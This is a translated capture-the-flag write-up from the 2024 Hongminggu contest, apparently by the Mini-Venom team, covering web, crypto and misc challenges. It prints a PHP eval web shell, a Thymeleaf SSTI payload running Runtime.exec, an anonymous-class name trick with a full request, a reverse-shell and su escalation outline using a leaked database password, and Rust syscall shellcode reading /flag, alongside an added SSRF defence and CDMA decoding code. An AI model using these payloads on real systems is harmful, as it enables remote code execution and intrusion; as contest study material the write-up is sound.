Web
unauth
<?php
if (!isset($_SERVER['PHP_AUTH_USER'])) {
    header('WWW-Authenticate: Basic realm="Restricted Area"');
    header('HTTP/1.0 401 Unauthorized');
    echo '小明是运维工程师,最近网站老是出现bug。';
    exit;
} else {
    $validUser = 'admin';
    $validPass = '2e525e29e465f45d8d7c56319fe73036';
    if ($_SERVER['PHP_AUTH_USER'] != $validUser || $_SERVER['PHP_AUTH_PW'] != $validPass) {
        header('WWW-Authenticate: Basic realm="Restricted Area"');
        header('HTTP/1.0 401 Unauthorized');
        echo 'Invalid credentials';
        exit;
    }
}
@eval($_GET['cmd']);
highlight_file(__FILE__);
?>
The flag is in the root directory; privilege escalation is needed.
Array ( [0] => . [1] => .. [2] => config.inc.php [3] => index.php [4] => www.zip )
<?php
# If you are having problems connecting to the MySQL database and all of the variables below are correct
# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
# Thanks to @digininja for the fix.
# Database management system to use
$DBMS = 'MySQL';
#$DBMS = 'PGSQL'; // Currently disabled
# Database variables
# WARNING: The database specified under db_database WILL BE ENTIRELY DELETED during setup.
# Please use a database dedicated to DVWA.
#
# If you are using MariaDB then you cannot use root, you must create a dedicated DVWA user.
# See README.md for more information on this.
$_DVWA = array();
$_DVWA[ 'db_server' ] = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = 'b90e0086d8b1165403de6974c4167165';
# Only used with PostgreSQL/PGSQL database selection.
$_DVWA[ 'db_port '] = '5432';
# ReCAPTCHA settings
# Used for the 'Insecure CAPTCHA' module
# You'll need to generate your own keys at: https://www.google.com/recaptcha/admin
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
# Default security level
# Default value for the security level with each session.
# The default is 'impossible'. You may wish to set this to either 'low', 'medium', 'high' or 'impossible'.
$_DVWA[ 'default_security_level' ] = 'impossible';
# Default PHPIDS status
# PHPIDS status with each session.
# The default is 'disabled'. You can set this to be either 'enabled' or 'disabled'.
$_DVWA[ 'default_phpids_level' ] = 'disabled';
# Verbose PHPIDS messages
# Enabling this will show why the WAF blocked the request on the blocked request.
# The default is 'disabled'. You can set this to be either 'true' or 'false'.
$_DVWA[ 'default_phpids_verbose' ] = 'false';
?>
Get a reverse shell via pcntl_exec, then su with the password read from the config to escalate privileges.
easyescape - post-competition reproduction
The DNS TTL is set to 0, and there is a 4-second gap between the name resolution and the actual request.
I thought it was DNS rebinding, but it didn't work in testing. Looking at it again today, there really are two requests, so a DNS rebinding attack is possible, but neither the local nor the remote attempt got through. A 302 redirect can be used to bypass it.
[image] The internal service is just a Thymeleaf SSTI, and it has outbound network access, so a shell can be popped directly.
Context context = new Context();
SpringTemplateEngine engine = new SpringTemplateEngine();
return engine.process(hostname, (IContext)context);
Put this in hostname:
[[${T(java.lang.Boolean).forName("com.fasterxml.jackson.databind.ObjectMapper").newInstance().readValue("{}",T(java.lang.Boolean).forName("org.springframework.expression.spel.standard.SpelExpressionParser")).parseExpression("T(Runtime).getRuntime().exec('calc')").getValue()}]]
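The two gaps the easyescape filter left open, as described above, are a second DNS lookup between the check and the connection (TTL=0) and a blindly followed 302. The following is an added example of a fetcher that closes both, not code from the writeup or the challenge: it resolves each hop exactly once, connects to the IP it validated, and re-validates every redirect target. The resolver and transport are injected (`resolve_fn`, `transport_fn`) so it runs offline; the host names and IP addresses in the two scenarios are constructed placeholders.

```python
import ipaddress
from urllib.parse import urlparse

def is_public_ip(ip_str):
    """Reject loopback, RFC1918, link-local and other non-routable targets."""
    ip = ipaddress.ip_address(ip_str)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

def safe_fetch(url, resolve_fn, transport_fn, max_redirects=3):
    """resolve_fn(host) -> ip string; transport_fn(ip, host, path) -> (status, headers, body).
    One lookup per hop, the IP that was checked is the IP connected to (no second
    lookup for a TTL=0 name to exploit), and each redirect target is validated."""
    for _ in range(max_redirects + 1):
        parts = urlparse(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return ("blocked", "unsupported url: %s" % url)
        ip = resolve_fn(parts.hostname)
        if not is_public_ip(ip):
            return ("blocked", "%s -> %s is not public" % (parts.hostname, ip))
        status, headers, body = transport_fn(ip, parts.hostname, parts.path or "/")
        if status in (301, 302, 303, 307, 308) and "Location" in headers:
            url = headers["Location"]   # back to the top: the new hop is re-checked
            continue
        return ("ok", body)
    return ("blocked", "too many redirects")

def rebinding_scenario():
    """Constructed: a TTL=0 name that answers a public IP first, loopback second."""
    answers, calls = ["11.22.33.44", "127.0.0.1"], []   # placeholder addresses
    def resolve_fn(host):
        calls.append(host)
        return answers[len(calls) - 1]
    def transport_fn(ip, host, path):
        return (200, {}, "connected to " + ip)
    return safe_fetch("http://rebind.example/", resolve_fn, transport_fn), len(calls)

def redirect_scenario():
    """Constructed: a public host answers 302 Location: http://127.0.0.1/admin."""
    def resolve_fn(host):
        return "44.33.22.11" if host == "hop.example" else host  # literal IP resolves to itself
    def transport_fn(ip, host, path):
        if host == "hop.example":
            return (302, {"Location": "http://127.0.0.1/admin"}, "")
        return (200, {}, "internal data")
    return safe_fetch("http://hop.example/", resolve_fn, transport_fn)
```

In a real client the transport must open the socket to the pinned IP and send the original name in the Host header (and SNI for TLS); an HTTP library that follows redirects on its own skips the per-hop check entirely.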
ezphp
https://github.com/synacktiv/php_filter_chains_oracle_exploit
Error-based oracle side-channel attack.
The tool has a chance of recovering part of the content; after passing the parameter below, there is a highlight_file.
/flag.php?ezphpPhp8=ko1sh1
<?php
if (isset($_GET['ezphpPhp8'])) {
    highlight_file(__FILE__);
} else {
    die("No");
}
$a = new class {
    function __construct()
    {
    }
    function getflag()
    {
        system('cat /flag');
    }
};
unset($a);
$a = $_GET['ezphpPhp8'];
$f = new $a();
$f->getflag();
?>
I don't see what this unset is for. Print the class name with get_class; note that it contains a null byte.
class@anonymous%00/var/www/html/flag.php:8$0
GET /flag.php?ezphpPhp8=class@anonymous%00/var/www/html/flag.php:7$0 HTTP/1.1
Host: eci-2zef6aoe4x8c78fobzdc.cloudeci1.ichunqiu.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1711431296,1711937711,1712027510
playground
With std banned, write a Rust program to execute anyway.
Use open/read/write to get the flag; the syscalls can be made with inline assembly (an orw shellcode in Rust).
fn main() {
    let mut buf = [0u8; 1024];
    let filename = "/flag\0";
    let fd: i64;
    let count: i64;
    unsafe {
        // open syscall: rax = 2, rdi = path, rsi = flags (O_RDONLY).
        // The syscall instruction clobbers rcx and r11, so declare them.
        core::arch::asm!(
            "syscall",
            in("rax") 2usize, // sys_open
            in("rdi") filename.as_ptr(),
            in("rsi") 0usize, // flags (O_RDONLY)
            lateout("rax") fd,
            out("rcx") _, out("r11") _,
        );
        // check that the file descriptor is valid (negative means -errno)
        if fd >= 0 {
            // read syscall
            core::arch::asm!(
                "syscall",
                in("rax") 0usize, // sys_read
                in("rdi") fd,
                in("rsi") buf.as_mut_ptr(),
                in("rdx") buf.len(),
                lateout("rax") count,
                out("rcx") _, out("r11") _,
            );
            if count > 0 {
                // write syscall: write what was read to standard output
                core::arch::asm!(
                    "syscall",
                    in("rax") 1usize, // sys_write
                    in("rdi") 1usize, // stdout
                    in("rsi") buf.as_ptr(),
                    in("rdx") count as usize,
                    lateout("rax") _, // return value is also placed in rax
                    out("rcx") _, out("r11") _,
                );
            }
        }
    }
}
Crypto
CDMA - post-competition reproduction
The given signal data contains Gaussian noise; denoise it first by taking the mean.
Then the whole algorithm can be seen as
But this is not exactly a matrix multiplication mod 2 either: in the vector inner product, adding element to element is XOR (addition mod 2), but the final addition is a plain sum. Still, XOR on {0, 1} corresponds one-to-one with multiplication on {1, -1},
so the operation above can also be mapped to a matrix multiplication (the signs apparently need to be flipped).
After obtaining the chips,
by the orthogonality of the converted CDMA codes,
we compute
and obtain
In this way the flag goes from a column vector to a row vector. However, because 1 and -1 are used here while the challenge's basis is 0 and 1, the result is not a multiple of 32; in practice, though, it is not complicated: there are only two possible values.
import pickle
from sage.all import matrix, ZZ  # run under Sage: matrix(), ZZ and .LLL() come from it

with open("output.pkl", "rb") as file:
    signal = pickle.load(file)

# Each symbol is repeated 1997 times with Gaussian noise: average it away,
# then group every 32 symbols into one row of the signal matrix.
signals = []
signals_col = []
for i in range(0, len(signal) // 1997):
    single_signal_list = signal[i * 1997:(i + 1) * 1997]
    single_signal = round((sum(single_signal_list) / 1997) * 10)
    signals.append(single_signal)
    if len(signals) == 32:
        signals_col.append(signals)
        signals = []

signals_matrix = matrix(ZZ, signals_col)
# LLL on the signal rows exposes the short vectors, i.e. the ten chip codes
chips = signals_matrix.LLL()[-11:-1]
# By orthogonality of the codes, chips * S^T leaves one of two values per entry
M_T = chips * signals_matrix.T
for m in M_T:
    tag = m[0]
    flag = ''.join(['0' if i == tag else '1' for i in m])
    # the original line was cut off after the length argument; 'big' is assumed
    print(int.to_bytes(int(flag, 2), 48, 'big'))
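The 0/1-XOR to ±1-multiplication mapping and the "only two possible values" observation above can be checked end to end. The following is an added simulation, not the challenge's or the writeup's code: it goes further than the text by also generating the signal (an XOR-sum spreading scheme with 1997-style repeated noisy samples, as inferred from the writeup) and then decodes it by correlating with the ±1 codes, which is the step the writeup performs with chips * S^T. Hadamard rows as the spreading codes, the user count, the bit mapping and all parameters are assumptions of this example.

```python
import random

CHIP_LEN = 32   # chips per symbol: the 32 columns of the writeup's matrix
USERS = 10      # spreading codes: the 10 LLL rows the writeup keeps
SAMPLES = 100   # noisy samples per chip (the challenge used 1997)

def hadamard_codes(n):
    """Sylvester construction: n mutually orthogonal +-1 rows of length n."""
    h = [[1]]
    while len(h) < n:
        h = [r + r for r in h] + [r + [-x for x in r] for r in h]
    return h

def transmit(bits_per_user, codes01, rng, sigma=0.5):
    """Assumed scheme, as read from the writeup: for chip j the symbol is
    sum_k (b_k XOR c_kj) as a plain integer sum; each symbol is then
    emitted SAMPLES times with Gaussian noise added (constructed data)."""
    signal = []
    for s in range(len(bits_per_user[0])):
        for j in range(CHIP_LEN):
            symbol = sum(b[s] ^ c[j] for b, c in zip(bits_per_user, codes01))
            signal.extend(symbol + rng.gauss(0, sigma) for _ in range(SAMPLES))
    return signal

def recover(signal, codes_pm1):
    """Average the noise away, then correlate with each +-1 code.  Since
    b XOR c = (1 - (-1)^b * (-1)^c) / 2, the correlation of a symbol row with
    code i is (K * sum(c_i) - CHIP_LEN * (-1)^b_i) / 2 = -16 * (-1)^b_i for any
    Hadamard row except the all-ones one: only two values, +-16, and the sign
    (flipped, as the writeup noticed) gives the bit."""
    means = [round(sum(signal[i:i + SAMPLES]) / SAMPLES)
             for i in range(0, len(signal), SAMPLES)]
    rows = [means[i:i + CHIP_LEN] for i in range(0, len(means), CHIP_LEN)]
    bits, seen = [], set()
    for code in codes_pm1:
        corr = [sum(c * v for c, v in zip(code, row)) for row in rows]
        seen.update(corr)
        bits.append([1 if x > 0 else 0 for x in corr])
    return bits, seen

def demo(seed=1, nsym=16):
    rng = random.Random(seed)
    codes_pm1 = hadamard_codes(CHIP_LEN)[1:USERS + 1]      # skip the all-ones row
    codes01 = [[(1 - x) // 2 for x in row] for row in codes_pm1]  # +1 -> 0, -1 -> 1
    message = [[rng.randrange(2) for _ in range(nsym)] for _ in range(USERS)]
    recovered, values = recover(transmit(message, codes01, rng), codes_pm1)
    return message, recovered, values
```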
Misc
Geolocation sign-in
Don't use Google, use Bing.
Originally published on the WeChat public account ChaMd5安全团队 (ChaMd5 Security Team): 2024 4th Hongminggu (红明谷) WriteUp By Mini-Venom